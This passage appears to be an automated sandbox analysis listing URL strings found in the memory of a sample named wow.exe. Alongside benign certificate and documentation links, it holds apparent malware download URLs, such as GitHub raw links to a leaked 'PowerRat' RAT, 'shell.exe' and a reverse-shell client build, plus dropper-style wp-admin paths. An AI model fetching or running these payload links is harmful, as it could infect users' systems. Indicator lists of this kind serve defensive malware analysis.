                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2241882672.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2244345593.000001D428D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cdaonline.com.ar/wp-admin/FILE/x7Z9wBk77Tt6v9/
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2241882672.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2244345593.000001D428D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cdaonline.com.ar/wp-admin/bXjesdj7W3meuh7iAtiURBsgh/
                            Source: wow.exe, 00000009.00000003.2540988639.000001D42C340000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2377176921.000001D42C340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certs.apple.com/wwdrg3.der01
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cfs10.blog.daum.net/upload_control/download.blog?fhandle=MDczaFhAZnMxMC5ibG9nLmRhdW0ubmV0Oi9J
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cfs13.tistory.com/upload_control/download.blog?fhandle=YmxvZzE5MTk5NUBmczEzLnRpc3RvcnkuY29tOi
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2241882672.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2244345593.000001D428D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cfs5.tistory.com/upload_control/download.blog?fhandle=YmxvZzcxMzYyQGZzNS50aXN0b3J5LmNvbTovYXR
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cfs7.blog.daum.net/upload_control/download.blog?fhandle=MEtnWE5AZnM3LmJsb2cuZGF1bS5uZXQ6U
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cfs9.blog.daum.net/upload_control/download.blog?fhandle=MEp5eURAZnM5LmJsb2cuZGF1bS5uZXQ6L0lNQ
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2244345593.000001D428D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://chiptune.com/razor/rzr-winner_intro.zip
                            Source: wow.exe, 00000009.00000003.2206467033.000001D427ADF000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2201703483.000001D428013000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2203869935.000001D427BE6000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3070415917.000001D427ADE000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3081049580.000001D427C38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/577916/
                            Source: wow.exe, 00000000.00000003.2163522569.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2161992111.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2163168293.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2184976666.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2163858197.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2162205557.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2188883507.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2163269107.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2160072899.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2181826496.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2187292399.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2188883507.0000028D65E1F000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2162596858.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2182817052.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2164104977.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2161348312.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2172584780.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2164104977.0000028D65E1E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2185661471.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2163423605.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2162433359.0000028D65E11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                            Source: wow.exe, 00000000.00000003.2181471915.0000028D65E13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                            Source: wow.exe, 00000000.00000003.2181471915.0000028D65E13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                            Source: wow.exe, 00000000.00000003.2163522569.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2161992111.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2163168293.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2184976666.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2163858197.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2172584780.0000028D65E1E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2162205557.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2188883507.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2163269107.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2160072899.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2181826496.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2187292399.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2188883507.0000028D65E1F000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2162596858.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2182817052.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2164104977.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2161348312.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2164104977.0000028D65E1E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2185661471.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2163423605.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2162433359.0000028D65E11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                            Source: wow.exe, 00000000.00000003.2163522569.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2161992111.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2163168293.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2184976666.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2163858197.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2162205557.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2188883507.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2163269107.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2160072899.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2181826496.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2187292399.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2162596858.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2182817052.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2164104977.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2161348312.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2172584780.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2185661471.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2163423605.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2162433359.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2368311174.000001D42C341000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                            Source: wow.exe, 00000000.00000003.2162433359.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2368311174.000001D42C341000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                            Source: wow.exe, 00000000.00000003.2181471915.0000028D65E13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                            Source: wow.exe, 00000000.00000003.2181471915.0000028D65E13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                            Source: wow.exe, 00000000.00000003.2181471915.0000028D65E13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                            Source: wow.exe, 00000000.00000003.2163522569.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2161992111.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2163168293.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2184976666.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2163858197.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2172584780.0000028D65E1E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2162205557.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2188883507.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2163269107.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2160072899.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2181826496.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2187292399.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2188883507.0000028D65E1F000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2162596858.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2182817052.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2164104977.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2161348312.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2164104977.0000028D65E1E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2185661471.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2163423605.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2162433359.0000028D65E11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                            Source: wow.exe, 00000000.00000003.2181471915.0000028D65E13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
                            Source: wow.exe, 00000000.00000003.2181471915.0000028D65E13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                            Source: wow.exe, 00000009.00000003.2214169440.000001D428A81000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2214260588.000001D428AD3000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2213804376.000001D428B51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://curl.haxx.se/rfc/cookie_spec.html
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2244345593.000001D428D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://down.pcclear.com/active/PCclear_Eng_mini.exe
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2241882672.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2244345593.000001D428D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://download.caihong.com/gamewd/yhdl.exe
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2244345593.000001D428D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://download.skycn.com/hao123-soft-online-bcs/soft/D/2014-06-12_djylh.exe
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2244345593.000001D428D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://download.skycn.com/hao123-soft-online-bcs/soft/P/pocketrar350sc.exe
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://files5.uludagbilisim.com/OrtakModul/NBYS%20ASM.NET.exe
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://files5.uludagbilisim.com/nbys.aspx?f=aile_hekimligi/NBYS%20AH.NET.exe
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2244345593.000001D428D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://funletters.net/flowers/flowers1/smell-the-roses.exe
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2244345593.000001D428D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://funletters.net/scenic/scenic1/jet.exe
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2244345593.000001D428D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://funletters.net/scenic/scenic1/sunset1.exe
                            Source: wow.exe, 00000009.00000003.2244858590.000001D428E0E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428E65000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://github.com/Deroxs/PowerRat-leak/raw/refs/heads/main/PowerRat.exe
                            Source: wow.exe, 00000009.00000003.2244858590.000001D428E0E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428E65000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://github.com/JZMVIP/JZMFREETOOL/raw/main/shell.exe
                            Source: wow.exe, 00000009.00000003.2244858590.000001D428E0E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428E65000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://github.com/tiraUnderCode/rev/raw/main/Client-built.exe
                            Source: wow.exe, 00000009.00000003.2244858590.000001D428E0E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428E65000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://github.com/vash0001/Discord/raw/main/Discordd.exe
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2241882672.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2244345593.000001D428D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hitstation.nl/css/parts_service/ly944myw/
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2241882672.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2244345593.000001D428D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hr2019.vrcom7.com/cgi-bin/Document/81828115/BKxJH/
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2244345593.000001D428D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hseda.com/download/qt51crk.exe
                            Source: wow.exe, 00000009.00000003.2881962600.000001D428D8C000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2244345593.000001D428D8C000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3056196762.000001D428D8C000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2807337493.000001D428D8C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://httpbin.org/post
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F90000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jobcity.com/img/RM0XpX/
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2244345593.000001D428D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jointings.org/eng/wp-content/plugins/featurific-for-wordpress/1
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2244345593.000001D428D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jointings.org/eng/wp-content/plugins/featurific-for-wordpress/2
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2244345593.000001D428D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jointings.org/eng/wp-content/plugins/featurific-for-wordpress/3
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2244345593.000001D428D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nerve.untergrund.net/releases/12.2013/nrv-ppwr.zip
